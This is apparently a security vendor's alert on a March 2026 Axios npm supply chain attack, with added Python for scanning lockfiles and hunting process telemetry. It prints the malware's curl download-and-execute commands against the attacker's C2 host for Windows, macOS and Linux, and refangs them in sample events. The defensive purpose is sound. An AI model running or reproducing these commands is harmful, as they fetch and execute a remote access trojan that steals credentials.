Security alert: Axios npm supply chain attack

By Aaron Walton

March 31, 2026  •  2 minute read

TL;DR

  • The Axios npm package suffered a supply chain attack. While malicious packages are no longer active, it’s important to hunt for activity which occurred while they were active: March 31 00:21 UTC–03:15 UTC.
  • The Axios npm package is a popular dependency used by other software, resulting in an impact against many organizations.
  • The malware ran a remote access trojan on impacted systems and it’s best to treat all npm tokens, AWS access keys, SSH private keys, and other credentials stored on the system as compromised.  

The Axios npm package suffered a supply chain attack for a short time on March 30 and 31. During the compromise, any automated or manual update that pulled the package would have executed malicious code. The malware was able to execute code on Windows, macOS, and Linux systems.

What happened?

The Axios npm package was compromised using the package maintainer’s access. The threat actors added a new dependency, plain-crypto-js@4.2.1, to the Axios library, so any Axios update or install during this time frame also installed this new, malicious dependency. The impact propagated transitively: any software that had Axios as a dependency was affected as well. This malicious dependency was responsible for reaching out to the attacker infrastructure and executing a remote access trojan (RAT) on the system.
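Because the malicious package arrived as a transitive dependency, the first question for most teams is whether any of their lockfiles ever pinned it. The following is an added example (not Expel's tooling and not part of the alert) that scans a package-lock.json for plain-crypto-js and for any package that declares it as a dependency. It handles both the flat "packages" map of lockfileVersion 2/3 and the nested "dependencies" tree of lockfileVersion 1. The sample lockfile, the "some-sdk" package name, and the version placeholders other than plain-crypto-js@4.2.1 are constructed for the example and are not indicators from the alert.

```python
import json
from typing import Dict, Iterator, List, Tuple

# Package and version named in the alert as the malicious dependency.
MALICIOUS_PACKAGE = "plain-crypto-js"
MALICIOUS_VERSION = "4.2.1"

# Constructed sample package-lock.json (lockfileVersion 3 layout). It models a
# project that never depends on axios directly but pulls it in through an SDK,
# and whose axios entry in turn requires plain-crypto-js@4.2.1. The SDK name
# and the non-malicious version strings are placeholders, not indicators.
SAMPLE_LOCKFILE = json.dumps({
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app", "dependencies": {"some-sdk": "^1.0.0"}},
        "node_modules/some-sdk": {
            "version": "1.0.0",
            "dependencies": {"axios": "^1.0.0"},
        },
        "node_modules/axios": {
            "version": "0.0.0-placeholder",
            "dependencies": {MALICIOUS_PACKAGE: MALICIOUS_VERSION},
        },
        "node_modules/" + MALICIOUS_PACKAGE: {"version": MALICIOUS_VERSION},
    },
})


def iter_packages(lock: dict) -> Iterator[Tuple[str, str, Dict[str, str]]]:
    """Yield (name, version, declared dependencies) for every installed package.

    lockfileVersion 2/3 files carry a flat "packages" map keyed by install path;
    lockfileVersion 1 files carry a nested "dependencies" tree with "requires".
    """
    if "packages" in lock:
        for path, meta in lock["packages"].items():
            if not path:  # "" is the root project itself
                continue
            # Works for scoped packages too: node_modules/@scope/name -> @scope/name
            name = path.rsplit("node_modules/", 1)[-1]
            yield name, meta.get("version", ""), meta.get("dependencies", {})
        return
    stack = list(lock.get("dependencies", {}).items())
    while stack:
        name, meta = stack.pop()
        yield name, meta.get("version", ""), meta.get("requires", {})
        stack.extend(meta.get("dependencies", {}).items())


def scan_lockfile(text: str) -> List[dict]:
    """Return findings for the malicious package and for anything that requires it."""
    findings = []
    for name, version, deps in iter_packages(json.loads(text)):
        if name == MALICIOUS_PACKAGE:
            findings.append({
                "kind": "malicious_package_installed",
                "package": name,
                "version": version,
                "version_named_in_alert": version == MALICIOUS_VERSION,
            })
        if MALICIOUS_PACKAGE in deps:
            findings.append({
                "kind": "requires_malicious_package",
                "package": name,
                "version": version,
                "requires": deps[MALICIOUS_PACKAGE],
            })
    return findings


if __name__ == "__main__":
    for finding in scan_lockfile(SAMPLE_LOCKFILE):
        print(finding)
```

Run this over every package-lock.json in your repositories and build images. A lockfile only shows what is pinned now; because the malicious dependency was reachable only during the window given in the TL;DR, hosts that ran an install or update in that window need to be checked for the execution artifacts described below even if their current lockfile is clean.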

The actors created a RAT for Windows, macOS, and Linux systems. 

Windows:

The malware writes, executes, and deletes a VBS script in the user’s AppData\Local\Temp directory. When run, this VBS script invokes curl to pull a remote payload which the attacker had staged.

curl -s -X POST -d "packages[.]npm[.]org/product1" "http[:]//sfrclak[.]com:8000/6202033" > "C:\Users\username\AppData\Local\Temp\6202033.ps1" & "C:\ProgramData\wt.exe" -w hidden -ep bypass -file "C:\Users\username\AppData\Local\Temp\6202033.ps1" "http[:]//sfrclak[.]com:8000/6202033" & del "C:\Users\username\AppData\Local\Temp\6202033.ps1" /f

The curl command writes a PowerShell script to the user’s Temp directory, which is then executed by wt.exe (a renamed copy of PowerShell; this technique is an attempt to bypass detections that look for “PowerShell.exe” executing suspicious scripts). This PowerShell script loads the trojan. Once it has run, the script is deleted to cover the attacker’s tracks.

macOS:

The malicious code executes the following command, naming the trojan file `com.apple.act.mond` to disguise it as a native Apple binary.

curl -o /Library/Caches/com.apple.act.mond -d packages.npm.org/product0 -s http[:]//sfrclak[.]com:8000/6202033

Linux:

On Linux, the malicious code simply downloads the remote content, saves it as a Python script, and executes it.

/usr/bin/dash -c curl -o /tmp/ld.py -d packages[.]npm[.]org/product2 -s http[:]//sfrclak[.]com:8000/6202033 && nohup python3 /tmp/ld.py http[:]//sfrclak[.]com:8000/6202033 > /dev/null 2>&1 &
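The three command lines above give enough to hunt retroactively in process-creation telemetry. Below is an added example (not Expel's detection content and not part of the alert) that refangs the indicators quoted here and matches them, plus the platform-specific artifacts (the C:\ProgramData\wt.exe copy with -ep bypass, a numeric .ps1 under AppData\Local\Temp, /Library/Caches/com.apple.act.mond, and /tmp/ld.py), against a list of command lines. The event records, host names, and benign look-alike commands are constructed for the example; the only indicators are the ones the alert quotes.

```python
import re
from typing import Dict, List

# Indicators copied from the alert in their defanged form; refang() produces the
# literal strings that appear in real process telemetry.
DEFANGED_C2_URL = "http[:]//sfrclak[.]com:8000/6202033"
DEFANGED_POST_DATA_PREFIX = "packages[.]npm[.]org/product"


def refang(ioc: str) -> str:
    """Convert a defanged indicator (http[:]//x[.]y) back to its literal form."""
    return ioc.replace("[.]", ".").replace("[:]", ":")


C2_URL = refang(DEFANGED_C2_URL)
POST_DATA_PREFIX = refang(DEFANGED_POST_DATA_PREFIX)

# (rule name, platform, compiled pattern). Full paths are matched rather than
# bare file names because wt.exe is also the legitimate Windows Terminal binary;
# the copy described in the alert lives in C:\ProgramData.
RULES = [
    ("c2_url_in_cmdline", "any", re.compile(re.escape(C2_URL))),
    ("npm_org_post_data", "any", re.compile(re.escape(POST_DATA_PREFIX) + r"\d")),
    ("programdata_wt_exe_ep_bypass", "windows",
     re.compile(r"C:\\ProgramData\\wt\.exe\b.*-ep\s+bypass", re.IGNORECASE)),
    ("temp_numeric_ps1", "windows",
     re.compile(r"\\AppData\\Local\\Temp\\\d+\.ps1", re.IGNORECASE)),
    ("fake_apple_cache_binary", "macos",
     re.compile(r"/Library/Caches/com\.apple\.act\.mond")),
    ("tmp_ld_py_download_or_exec", "linux",
     re.compile(r"-o\s+/tmp/ld\.py|python3\s+/tmp/ld\.py")),
]

# Constructed process-creation events. The first three reproduce the commands
# quoted in the alert (refanged); the last two are benign look-alikes that a
# name-only rule would false-positive on.
SAMPLE_EVENTS = [
    {"host": "win-dev-01", "platform": "windows",
     "cmdline": rf'"C:\ProgramData\wt.exe" -w hidden -ep bypass -file '
                rf'"C:\Users\username\AppData\Local\Temp\6202033.ps1" {C2_URL}'},
    {"host": "mac-dev-02", "platform": "macos",
     "cmdline": f"curl -o /Library/Caches/com.apple.act.mond -d {POST_DATA_PREFIX}0 -s {C2_URL}"},
    {"host": "lin-build-01", "platform": "linux",
     "cmdline": f"/usr/bin/dash -c curl -o /tmp/ld.py -d {POST_DATA_PREFIX}2 -s {C2_URL} "
                f"&& nohup python3 /tmp/ld.py {C2_URL} > /dev/null 2>&1 &"},
    {"host": "win-dev-09", "platform": "windows",
     "cmdline": r'"C:\Users\dev\AppData\Local\Microsoft\WindowsApps\wt.exe" -p "PowerShell"'},
    {"host": "lin-ci-03", "platform": "linux",
     "cmdline": "curl -s https://registry.npmjs.org/axios"},
]


def match_events(events: List[dict]) -> List[Dict[str, str]]:
    """Return one hit per (event, rule) pair whose command line matches."""
    hits = []
    for ev in events:
        for name, platform, pattern in RULES:
            if platform != "any" and platform != ev["platform"]:
                continue
            if pattern.search(ev["cmdline"]):
                hits.append({"host": ev["host"], "rule": name})
    return hits


def hosts_to_triage(events: List[dict]) -> Dict[str, List[str]]:
    """Map each host with at least one hit to the sorted list of rules it tripped."""
    triage: Dict[str, List[str]] = {}
    for hit in match_events(events):
        triage.setdefault(hit["host"], []).append(hit["rule"])
    return {host: sorted(rules) for host, rules in sorted(triage.items())}


if __name__ == "__main__":
    for host, rules in hosts_to_triage(SAMPLE_EVENTS).items():
        print(host, rules)
```

The C2 URL rule is the highest-confidence signal and is platform-agnostic; the path rules catch the case where the payload URL has been rotated but the on-disk staging locations have not. Any host that trips these during the window in the TL;DR should be treated as having run the RAT, with the credential rotation the TL;DR describes.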

What Expel is doing

The Expel SOC has been working with impacted organizations and providing remediation since this activity began. Expel first saw an alert from one of our custom detections about this hitting a customer at approximately 2026-03-31T00:50:00 UTC (~22 minutes after the package went live). After we saw the activity impacting multiple organizations, we pushed communications to our customers as a Threat Bulletin and created an Emerging Threat Hunt to confirm all incidents were caught.

Additional resources